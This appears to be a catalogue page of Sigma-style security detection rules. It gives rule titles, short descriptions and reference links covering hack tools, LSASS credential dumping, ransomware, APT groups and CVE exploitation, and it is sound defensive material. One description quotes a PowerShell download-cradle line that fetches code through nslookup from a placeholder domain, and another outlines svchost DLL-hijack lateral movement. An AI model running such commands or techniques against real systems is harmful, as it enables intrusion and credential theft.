  • HackTool - DiagTrackEoP Default Named Pipe
  • HackTool - Koh Default Named Pipe
  • HackTool - Credential Dumping Tools Named Pipe Created
  • Malicious Named Pipe Created
  • Bad Opsec Powershell Code Artifacts
  • Silence.EDA Detection
  • Suspicious PowerShell Mailbox Export to Share - PS
  • Persistence Via Sticky Key Backdoor
  • Sticky Key Like Backdoor Execution
  • HackTool - F-Secure C3 Load by Rundll32
  • HackTool - DInjector PowerShell Cradle Execution
  • HackTool - Dumpert Process Dumper Execution
  • HackTool - Empire PowerShell UAC Bypass
  • Hacktool Execution - Imphash
  • HackTool - Inveigh Execution
  • HackTool - PurpleSharp Execution
  • Potential SMB Relay Attack Tool Execution
  • HackTool - Rubeus Execution
  • HackTool - SafetyKatz Execution
  • HackTool - SecurityXploded Execution
  • HackTool - SharpUp PrivEsc Tool Execution
  • HackTool - Sliver C2 Implant Activity Pattern
  • HackTool - SysmonEOP Execution
  • HackTool - Windows Credential Editor (WCE) Execution
  • Potential Credential Dumping Via LSASS Process Clone
  • Suspicious Child Process Of Veeam Dabatase
  • Suspicious PowerShell Mailbox Export to Share
  • Renamed Whoami Execution
  • Suspicious Double Extension File Execution
  • DumpStack.log Defender Evasion
  • TrustedPath UAC Bypass Pattern
  • WMI Backdoor Exchange Transport Agent
  • Pandemic Registry Key
  • Windows Credential Editor Registry
  • Registry Entries For Azorult Malware
  • PrinterNightmare Mimikatz Driver Name
  • Potential Credential Dumping Via LSASS SilentProcessExit Technique
  • Sticky Key Like Backdoor Usage - Registry
  • CVE-2010-5278 Exploitation Attempt
  • ZxShell Malware
  • Turla Group Lateral Movement
  • Turla Group Commands May 2020
  • Exploit for CVE-2015-1641
  • Droppers Exploiting CVE-2017-11882
  • Exploit for CVE-2017-8759
  • CosmicDuke Service Installation
  • NotPetya Ransomware Activity
  • WannaCry Ransomware Activity
  • Turla Group Named Pipes
  • Turla PNG Dropper Service
  • Fortinet CVE-2018-13379 Exploitation
  • Oracle WebLogic Exploit
  • Elise Backdoor Activity
  • APT27 - Emissary Panda Activity
  • APT29 2018 Phishing Campaign File Indicators
  • APT29 2018 Phishing Campaign CommandLine Indicators
  • OceanLotus Registry Activity
  • OilRig APT Activity
  • OilRig APT Registry Persistence
  • OilRig APT Schedule Task Persistence - Security
  • OilRig APT Schedule Task Persistence - System
  • Pulse Secure Attack CVE-2019-11510
  • Citrix Netscaler Attack CVE-2019-19781
  • Exploiting CVE-2019-1388
  • Confluence Exploitation CVE-2019-3398
  • Potential Dridex Activity
  • Potential Dtrack RAT Activity
  • LockerGoga Ransomware Activity
  • Potential QBot Activity
  • Ursnif Malware C2 URL Pattern
  • APT31 Judgement Panda Activity
  • Potential Russian APT Credential Theft Activity
  • Equation Group DLL_U Export Function Load
  • CVE-2020-0688 Exchange Exploitation via Web Log
  • CVE-2020-10148 SolarWinds Orion API Auth Bypass
  • DNS RCE CVE-2020-1350
  • Potential Emotet Rundll32 Execution
  • CVE-2020-5902 F5 BIG-IP Exploitation Attempt
  • Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195
  • Potential Maze Ransomware Activity
  • EvilNum APT Golden Chickens Deployment Via OCX Files
  • FlowCloud Registry Markers
  • Lazarus Group Activity
  • Leviathan Registry Key Activity
  • Solarwinds SUPERNOVA Webshell Access
  • Greenbug Espionage Group Indicators
  • UNC2452 PowerShell Pattern
  • Winnti Malware HK University Campaign
  • Winnti Pipemon Characteristics
  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum
  • CVE-2021-31979 CVE-2021-33771 Exploits
  • Arcadyan Router Exploitations
  • Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection
  • CVE-2021-1675 Print Spooler Exploitation Filename Pattern
  • CVE-2021-1675 Print Spooler Exploitation
  • CVE-2021-1675 Print Spooler Exploitation IPC Access
  • Oracle WebLogic Exploit CVE-2021-2109
  • Fortinet CVE-2021-22123 Exploitation
  • ProxyLogon Reset Virtual Directories Based On IIS Log
  • Exchange Exploitation CVE-2021-28480
  • CVE-2021-33766 Exchange ProxyToken Exploitation
  • Serv-U Exploitation CVE-2021-35211 by DEV-0322
  • CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit
  • InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
  • Potential CVE-2021-41379 Exploitation Attempt
  • Grafana Path Traversal Exploitation CVE-2021-43798
  • Successful Exchange ProxyShell Attack
  • Potential SystemNightmare Exploitation Attempt
  • Potential Conti Ransomware Activity
  • DarkSide Ransomware Pattern
  • FoggyWeb Backdoor DLL Loading
  • Goofy Guineapig Backdoor Service Creation
  • Moriya Rootkit File Created
  • Small Sieve Malware Potential C2 Communication
  • HAFNIUM Exchange Exploitation Activity
  • REvil Kaseya Incident Malware Patterns
  • OWASSRF Exploitation Attempt Using Public POC - Proxy
  • OWASSRF Exploitation Attempt Using Public POC - Webserver
  • CVE-2023-23397 Exploitation Attempt
  • Potential CVE-2023-36884 Exploitation Pattern
  • COLDSTEEL RAT Cleanup Command Execution
  • COLDSTEEL RAT Service Persistence Execution
  • Griffon Malware Attack Pattern
  • Qakbot Rundll32 Exports Execution
  • Qakbot Rundll32 Fake DLL Extension Execution
  • Rorschach Ransomware Execution Activity
  • SNAKE Malware Kernel Driver File Indicator
  • SNAKE Malware Service Persistence
  • Malicious DLL Load By Compromised 3CXDesktopApp
  • Diamond Sleet APT Scheduled Task Creation
  • Mint Sandstorm - AsperaFaspex Suspicious Process Execution
  • Mint Sandstorm - ManageEngine Suspicious Process Execution
  • UNC4841 - Potential SEASPY Execution
  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security
  • CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation
  • Meterpreter or Cobalt Strike Getsystem Service Installation
  • Malicious Service Installations
informational 30
Show Rules (30)
  • Suspicious Load of Advapi31.dll
  • Windows Management Instrumentation DLL Loaded Via Microsoft Word
  • New Github Organization Member Added
  • New Okta User Created
  • System and Hardware Information Discovery
  • System Shutdown/Reboot - Linux
  • File and Directory Discovery - Linux
  • File Deletion
  • System Information Discovery
  • System Network Discovery - Linux
  • File and Directory Discovery - MacOS
  • Local Groups Discovery - MacOs
  • Network Sniffing - MacOs
  • Macos Remote System Discovery
  • System Network Discovery - macOS
  • System Network Connections Discovery - MacOs
  • System Shutdown/Reboot - MacOs
  • Failed Code Integrity Checks
  • User Logoff Event
  • VSSAudit Security Event Source Registration
  • Locked Workstation
  • Windows Update Error
  • Windows Defender Malware Detection History Deletion
  • Windows Spooler Service Suspicious Binary Load
  • New PowerShell Instance Created
  • PowerShell Decompress Commands
  • Suspicious High IntegrityLevel Conhost Legacy Option
  • New Application in AppCompat
  • Potential BOINC Software Execution (UC-Berkeley Signature)
  • Suspicious Tasklist Discovery Command

Rule Details

Rule TitleDescriptionReferences
App Permissions Granted For Other APIs Detects when app permissions (app roles) for other APIs are granted https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions
Edit of .bash_profile and .bashrc Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell. MITRE Attack technique T1156; .bash_profile and .bashrc.
OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://github.com/Azure/Azure-Sentinel/pull/3059
User Added To Admin Group - MacOS Detects attempts to create and/or add an account to the admin group, thus granting admin privileges. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos, https://ss64.com/osx/dscl.html, https://ss64.com/osx/sysadminctl.html
Brute Force Detects many authentication failures from one source to one destination which is may indicate Brute Force activity None
Domestic Kitten FurBall Malware Pattern Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/
CobaltStrike Malleable Amazon Browsing Traffic Profile Detects Malleable Amazon Profile https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile, https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100
CobaltStrike Malformed UAs in Malleable Profiles Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/
CobaltStrike Malleable (OCSP) Profile Detects Malleable (OCSP) Profile with Typo (OSCP) in URL https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile
CobaltStrike Malleable OneDrive Browsing Traffic Profile Detects Malleable OneDrive Profile https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile
iOS Implant URL Pattern Detects URL pattern used by iOS Implant https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html, https://twitter.com/craiu/status/1167358457344925696
Search-ms and WebDAV Suspicious Indicators in URL Detects URL pattern used by search(-ms)/WebDAV initial access campaigns. https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462
Suspicious Remote Thread Target Offensive tradecraft is switching away from using APIs like "CreateRemoteThread", however, this is still largely observed in the wild. This rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes. It is a generalistic rule, but it should have a low FP ratio due to the selected range of processes. https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
Credential Dumping Tools Service Execution Detects well-known credential dumping tools execution via service execution events https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Usage Of Malicious POORTRY Signed Driver Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One. https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware
PowerShell Scripts Run by a Services Detects powershell script installed as a Service https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Vulnerable AVAST Anti Rootkit Driver Load Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/
Vulnerable Dell BIOS Update Driver Load Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551 https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
Vulnerable Driver Load By Name Detects the load of known vulnerable drivers via their names only. https://loldrivers.io/
Vulnerable GIGABYTE Driver Load Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b, https://twitter.com/malmoeb/status/1551449425842786306, https://github.com/fengjixuchui/gdrv-loader, https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details, https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details
Vulnerable HW Driver Load Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/, https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details
Vulnerable Lenovo Driver Load Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities, https://github.com/alfarom256/CVE-2022-3699/
Suspicious File Event With Teams Objects Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
Suspicious Unattend.xml File Access Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
CrackMapExec File Creation Patterns Detects suspicious file creation patterns found in logs when CrackMapExec is used https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass
LSASS Memory Dump File Creation LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
CreateMiniDump Hacktool Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
Mimikatz MemSSP Default Log File Creation Detects Mimikatz MemSSP default log file creation https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
Alternate PowerShell Hosts - Image Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html
Suspicious CLR Logs Creation Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly. https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html, https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/, https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml
Suspicious Load of Advapi31.dll Detects the load of advapi31.dll by a process running in an uncommon folder https://github.com/hlldz/Phant0m
SCM DLL Sideload Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992
Svchost DLL Search Order Hijack Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services "svchost.exe -k netsvcs" to gain code execution on a remote machine. https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992
Possible Process Hollowing Image Loading Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz https://web.archive.org/web/20220815065318/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html
Windows Management Instrumentation DLL Loaded Via Microsoft Word Detects DLL's Loaded Via Word Containing VBA Macros Executing WMI Commands https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16, https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/, https://media.cert.europa.eu/static/SecurityAdvisories/2019/CERT-EU-SA2019-021.pdf
Microsoft Binary Github Communication Detects an executable in the Windows folder accessing github.com https://twitter.com/M_haggis/status/900741347035889665, https://twitter.com/M_haggis/status/1032799638213066752, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1
Suspicious Non-Browser Network Communication With Reddit API Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2 https://github.com/kleiton0x00/RedditC2, https://twitter.com/kleiton0x7e/status/1600567316810551296, https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al
Suspicious Epmap Connection Detects suspicious "epmap" connection to a remote computer via remote procedure call (RPC) https://github.com/RiccardoAncarani/TaskShell/
PsExec Pipes Artifacts Detecting use PsExec via Pipe Creation/Access to pipes https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
Netcat The Powershell Version - PowerShell Module Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network https://nmap.org/ncat/, https://github.com/besimorhino/powercat, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md
Accessing Encrypted Credentials from Google Chrome Login Database Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md
AzureHound PowerShell Commands Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html
Execution via CL_Invocation.ps1 - Powershell Detects Execution via SyncInvoke in CL_Invocation.ps1 module https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/, https://twitter.com/bohops/status/948061991012327424
Execution via CL_Mutexverifiers.ps1 Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/, https://twitter.com/pabraeken/status/995111125447577600
Powershell File and Directory Discovery Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md
Dnscat Execution Dnscat exfiltration tool execution None
PrintNightmare Powershell Exploitation Detects Commandlet name for PrintNightmare exploitation. https://github.com/calebstewart/CVE-2021-1675
Suspicious Get-WmiObject The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers https://attack.mitre.org/datasources/DS0005/, https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7
Suspicious PowerShell Download Detects suspicious PowerShell download command None
Suspicious PowerShell Invocations - Generic Detects suspicious PowerShell invocation command parameters None
Suspicious PowerShell Invocations - Specific Detects suspicious PowerShell invocation command parameters None
SyncAppvPublishingServer Execution to Bypass Powershell Restriction Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
SyncAppvPublishingServer Execution to Bypass Powershell Restriction Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
Suspicious In-Memory Module Execution Detects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space. An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way), it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory. Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious. https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/
Credential Dumping by LaZagne Detects LSASS process access by LaZagne for credential dumping. https://twitter.com/bh4b3sh/status/1303674603819081728
Credential Dumping Tools Accessing LSASS Memory Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
Credential Dumping by Pypykatz Detects LSASS process access by pypykatz for credential dumping. https://github.com/skelsec/pypykatz
Potential NT API Stub Patching Detects potential NT API stub patching as seen used by the project PatchingAPI https://web.archive.org/web/20230106211702/https://github.com/D1rkMtr/UnhookingPatch, https://twitter.com/D1rkMtr/status/1611471891193298944?s=20
APT29 This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks. https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/, https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html
CrackMapExecWin Detects CrackMapExecWin Activity as Described by NCSC https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control, https://attack.mitre.org/software/S0488/
GALLIUM Artefacts Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)
Suspicious Certutil Command Usage Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code https://twitter.com/JohnLaTwC/status/835149808817991680, https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/, https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/
Hurricane Panda Activity Detects Hurricane Panda Activity https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/
Lazarus Activity Apr21 Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/
Lazarus Loaders Detects different loaders as described in various threat reports on Lazarus group activity https://www.hvs-consulting.de/lazarus-report/, https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
DNS Tunnel Technique from MuddyWater Detecting DNS tunnel activity for Muddywater actor https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/, https://www.vmray.com/analyses/5ad401c3a568/report/overview.html
TA505 Dropper Load Pattern Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents https://twitter.com/ForensicITGuy/status/1334734244120309760
Read and Execute a File Via Cmd.exe Detect use of "/R <" to read and execute a file via cmd.exe https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md
Cmd Stream Redirection Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt
Credential Acquisition via Registry Hive Dumping Detects Credential Acquisition via Registry Hive Dumping https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html
Visual Basic Script Execution Adversaries may abuse Visual Basic (VB) for execution https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md
Execution via MSSQL Xp_cmdshell Stored Procedure Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default. https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html
Indirect Command Exectuion via Forfiles Detects execition of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting. https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a, https://lolbas-project.github.io/lolbas/Binaries/Forfiles/
Indirect Command Execution Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe). https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md, https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html
Invoke-Obfuscation RUNDLL LAUNCHER Detects Obfuscated Powershell via RUNDLL LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Rundll32 Detects Obfuscated Powershell via use Rundll32 in Scripts https://github.com/SigmaHQ/sigma/issues/1009
New Lolbin Process by Office Applications This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml, https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml, https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A, https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set
Monitoring Wuauclt.exe For Lolbas Execution Of DLL Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL. https://dtm.uk/wuauclt/
Abusing Findstr for Defense Evasion Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism https://lolbas-project.github.io/lolbas/Binaries/Findstr/, https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Suspicious File Download Using Office Application Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/, https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Execute MSDT.EXE Using Diagcab File Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190 https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0, https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd
Ryuk Ransomware Command Line Activity Detects Ryuk Ransomware command lines https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/
MavInject Process Injection Detects process injection using the signed Windows tool Mavinject32.exe https://twitter.com/gN3mes1s/status/941315826107510784, https://reaqta.com/2017/12/mavinject-microsoft-injector/, https://twitter.com/Hexacorn/status/776122138063409152
Process Memory Dumped Via RdrLeakDiag.EXE Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/
Trickbot Malware Reconnaissance Activity Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/, https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/
New Service Creation Detects creation of a new service. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md
Nslookup PwSh Download Cradle This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] https://twitter.com/alh4zr3d/status/1566489367232651264
Application Whitelisting Bypass via DLL Loaded by odbcconf.exe Detects defence evasion attempt via odbcconf.exe execution to load DLL https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://twitter.com/Hexacorn/status/1187143326673330176, https://redcanary.com/blog/raspberry-robin/, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca
